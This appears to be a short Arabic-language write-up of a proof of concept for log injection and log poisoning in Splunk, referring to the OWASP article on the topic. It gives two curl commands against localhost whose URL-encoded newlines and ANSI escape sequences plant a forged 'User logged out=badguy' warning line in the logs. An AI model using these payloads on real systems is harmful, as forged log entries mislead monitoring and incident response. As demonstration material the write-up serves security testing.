
إثبات مفهوم يوضح حقن السجلات وتسميمها في Splunk عبر معاملات URL مصممة بعناية، مع تسليط الضوء على مخاطر حقن السجلات وفقًا لـ OWASP.
لا أدري، لقد قرأت للتو ما أرسله لي صديقي وبدأت في كتابة بعض أكواد جافا سكريبت العشوائية التافهة
يرجى قراءة هذه المقالة OWASP Log Injection
ابحث عن ملف ثابت، وقم بتمريره وإلحاق معامل عشوائي به
لذا، أقوم بتمرير curl -k "https://localhost:8000/en-US/static/app/search/application.css%0Atest%0A%0A%0AWARN%3A%20User%20logged%20out%3Dbadguy%0A----LOG_INJECTION_TEST_12345----" OR curl -k "https://localhost:8000/en-US/static/app/search/application.css%1B[31mANSI_TEST_RED%1B[0m%0Atest%0A%0A%0AWARN%3A%20User%20logged%20out%3Dbadguy%0A----LOG_INJECTION_TEST_12345----"
إذا رأيت سطرًا جديدًا عشوائيًا يظهر، فهذا تسميم، قد تشعر أنه لا بأس به لأنه مجرد تسميم "عادي" لكنه قد يكون مزعجًا إذا كان مستهدفًا بشدة.